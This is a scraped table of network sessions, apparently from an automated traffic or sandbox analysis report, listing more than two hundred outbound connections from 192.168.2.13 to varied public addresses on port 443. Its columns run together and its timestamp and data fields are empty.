                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22990192.168.2.1344234148.86.66.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22991192.168.2.133604897.187.67.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22992192.168.2.134286688.113.113.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22993192.168.2.134248485.101.166.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22994192.168.2.1347552200.232.211.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22995192.168.2.133850851.108.11.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22996192.168.2.1334926130.220.117.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22997192.168.2.1344200129.49.231.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22998192.168.2.1351984175.186.240.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22999192.168.2.1359994112.188.212.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23000192.168.2.135346047.0.169.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23001192.168.2.1340374126.25.172.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23002192.168.2.1357368115.49.38.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23003192.168.2.1340516121.131.39.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23004192.168.2.134719457.216.225.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23005192.168.2.1359516149.118.204.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23006192.168.2.133840281.80.130.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23007192.168.2.1358660142.151.244.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23008192.168.2.1337704114.150.115.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23009192.168.2.134240683.250.69.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23010192.168.2.1352050198.156.110.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23011192.168.2.136007081.59.57.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23012192.168.2.135943280.72.166.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23013192.168.2.1352514179.33.162.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23014192.168.2.1345966207.19.17.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23015192.168.2.133302458.199.220.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23016192.168.2.13347662.126.195.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23017192.168.2.1337096125.9.146.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23018192.168.2.134258660.133.10.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23019192.168.2.1333498118.30.220.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23020192.168.2.1350738195.255.56.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23021192.168.2.1343388184.20.184.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23022192.168.2.1355294159.131.65.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23023192.168.2.134903678.140.92.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23024192.168.2.1355956177.203.16.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23025192.168.2.136059687.213.35.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23026192.168.2.135739238.74.166.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23027192.168.2.1341424210.170.68.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23028192.168.2.1360342138.186.115.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23029192.168.2.134827098.149.198.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23030192.168.2.1342594132.228.130.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23031192.168.2.133703858.198.198.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23032192.168.2.136054220.209.96.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23033192.168.2.1347960122.136.167.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23034192.168.2.135096676.24.209.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23035192.168.2.135773846.233.108.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23036192.168.2.135088460.142.147.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23037192.168.2.133917866.183.211.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23038192.168.2.1344070209.63.230.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23039192.168.2.1346554178.188.73.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23040192.168.2.134305414.2.205.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23041192.168.2.134226070.36.192.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23042192.168.2.134079840.196.102.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23043192.168.2.133820442.43.218.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23044192.168.2.1333608184.183.101.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23045192.168.2.1335954131.83.172.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23046192.168.2.1337746185.22.206.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23047192.168.2.1349230187.197.160.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23048192.168.2.133631214.207.162.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23049192.168.2.1339602159.190.39.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23050192.168.2.134798048.13.112.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23051192.168.2.134444049.109.83.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23052192.168.2.1354684166.104.184.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23053192.168.2.133338475.123.222.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23054192.168.2.1333768148.152.37.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23055192.168.2.1355918196.146.133.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23056192.168.2.133731498.134.171.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23057192.168.2.135431691.161.229.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23058192.168.2.1357550160.181.171.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23059192.168.2.135205882.91.213.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23060192.168.2.135691047.58.61.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23061192.168.2.133942488.95.44.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23062192.168.2.134338414.104.241.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23063192.168.2.134890061.188.231.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23064192.168.2.1344282123.132.184.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23065192.168.2.135086874.181.154.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23066192.168.2.1360952176.24.44.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23067192.168.2.13484428.215.121.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23068192.168.2.134421654.145.112.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23069192.168.2.1333196162.121.85.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23070192.168.2.1360224145.197.219.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23071192.168.2.134809461.92.220.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23072192.168.2.133426265.225.72.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23073192.168.2.135689258.199.28.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23074192.168.2.133589289.201.21.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23075192.168.2.1340668153.240.225.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23076192.168.2.133666239.138.197.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23077192.168.2.1351102111.18.148.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23078192.168.2.134602672.109.64.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23079192.168.2.1348752123.40.224.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23080192.168.2.134311247.185.192.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23081192.168.2.134060499.155.3.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23082192.168.2.1352590116.1.117.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23083192.168.2.135929218.126.197.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23084192.168.2.135951041.226.206.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23085192.168.2.133954820.101.244.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23086192.168.2.1353656157.159.127.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23087192.168.2.1356862165.208.109.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23088192.168.2.133628064.228.192.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23089192.168.2.1354734201.220.105.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23090192.168.2.135684478.167.17.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23091192.168.2.134474484.249.31.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23092192.168.2.1341754221.237.232.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23093192.168.2.133546834.52.30.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23094192.168.2.135045460.3.177.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23095192.168.2.133392817.198.163.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23096192.168.2.1344900128.247.100.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23097192.168.2.134687843.30.14.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23098192.168.2.1334450169.234.33.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23099192.168.2.134244212.206.238.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23100192.168.2.134632223.244.158.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23101192.168.2.134822671.50.124.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23102192.168.2.1355716114.161.113.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23103192.168.2.1335486204.177.60.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23104192.168.2.135878819.76.37.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23105192.168.2.133820283.9.166.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23106192.168.2.1350844185.95.141.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23107192.168.2.133587669.189.145.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23108192.168.2.1359336161.222.4.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23109192.168.2.133648825.235.95.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23110192.168.2.1337468208.29.193.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23111192.168.2.1347804149.241.221.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23112192.168.2.1334914198.24.136.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23113192.168.2.1354804111.121.160.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23114192.168.2.135520084.203.156.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23115192.168.2.1345312144.54.156.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23116192.168.2.1347286183.70.223.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23117192.168.2.1347612189.167.128.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23118192.168.2.1337098148.227.169.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23119192.168.2.13537465.170.217.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23120192.168.2.1339850122.50.61.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23121192.168.2.135941835.62.245.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23122192.168.2.1353098220.165.195.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23123192.168.2.1338500108.86.229.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23124192.168.2.1337708124.220.94.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23125192.168.2.134935061.61.170.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23126192.168.2.1335868119.230.207.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23127192.168.2.1353004113.69.131.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23128192.168.2.1348750159.82.139.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23129192.168.2.135559420.136.211.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23130192.168.2.1348622101.59.77.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23131192.168.2.135431877.171.112.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23132192.168.2.136002463.137.152.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23133192.168.2.133382613.170.90.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23134192.168.2.135644845.31.79.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23135192.168.2.1352614123.178.127.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23136192.168.2.133875291.191.245.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23137192.168.2.1351122186.178.101.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23138192.168.2.1345104150.89.238.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23139192.168.2.135734420.60.234.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23140192.168.2.1360656175.3.9.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23141192.168.2.1355764159.135.89.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23142192.168.2.1350698164.98.79.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23143192.168.2.1340404157.157.41.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23144192.168.2.1357118166.116.207.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23145192.168.2.1342528131.107.88.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23146192.168.2.1342742221.199.179.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23147192.168.2.1356180209.94.14.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23148192.168.2.1352448108.199.173.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23149192.168.2.135914452.237.250.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23150192.168.2.1355912182.41.51.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23151192.168.2.1348442194.19.209.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23152192.168.2.1335726166.189.58.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23153192.168.2.135420484.179.76.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23154192.168.2.1347942177.147.17.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23155192.168.2.1341874125.145.0.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23156192.168.2.1339790189.61.160.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23157192.168.2.1351040121.187.210.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23158192.168.2.1355440162.29.197.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23159192.168.2.13585505.76.227.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23160192.168.2.133549443.175.189.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23161192.168.2.13592648.178.143.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23162192.168.2.134195036.75.24.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23163192.168.2.135080074.54.122.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23164192.168.2.135542496.83.177.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23165192.168.2.1349130139.109.230.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23166192.168.2.1344252115.250.233.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23167192.168.2.1334732191.239.9.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23168192.168.2.1355740183.60.223.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23169192.168.2.1333852212.252.222.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23170192.168.2.1359140179.121.192.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23171192.168.2.1335698148.148.82.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23172192.168.2.135894857.150.175.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23173192.168.2.1335708209.172.206.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23174192.168.2.134204664.149.208.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23175192.168.2.1341518108.204.94.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23176192.168.2.1343424218.32.125.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23177192.168.2.1340012194.85.10.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23178192.168.2.135201873.30.146.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23179192.168.2.1337860160.179.39.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23180192.168.2.133976854.40.194.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23181192.168.2.135115850.41.140.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23182192.168.2.134517658.100.238.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23183192.168.2.1345240131.180.183.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23184192.168.2.134208664.218.163.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23185192.168.2.134698277.7.229.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23186192.168.2.1337666135.42.104.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23187192.168.2.134314473.217.206.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23188192.168.2.1337714160.102.72.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23189192.168.2.1345312179.135.85.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23190192.168.2.1359180211.175.131.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23191192.168.2.133575640.219.68.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23192192.168.2.1354740107.196.140.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23193192.168.2.1354778135.242.58.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23194192.168.2.1350626132.115.131.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23195192.168.2.1354230193.120.29.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23196192.168.2.1350884155.168.73.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23197192.168.2.134715665.122.224.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23198192.168.2.133312840.187.251.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23199192.168.2.135436859.12.254.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23200192.168.2.1358526222.37.85.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23201192.168.2.1348120136.7.209.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23202192.168.2.134392258.66.186.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23203192.168.2.1336106200.222.224.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23204192.168.2.135771225.238.131.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23205192.168.2.1353490122.8.231.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23206192.168.2.1337682216.234.12.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23207192.168.2.135571297.234.235.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23208192.168.2.134383443.149.178.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23209192.168.2.135211877.41.191.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23210192.168.2.135389093.226.217.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23211192.168.2.1360014112.5.113.195443
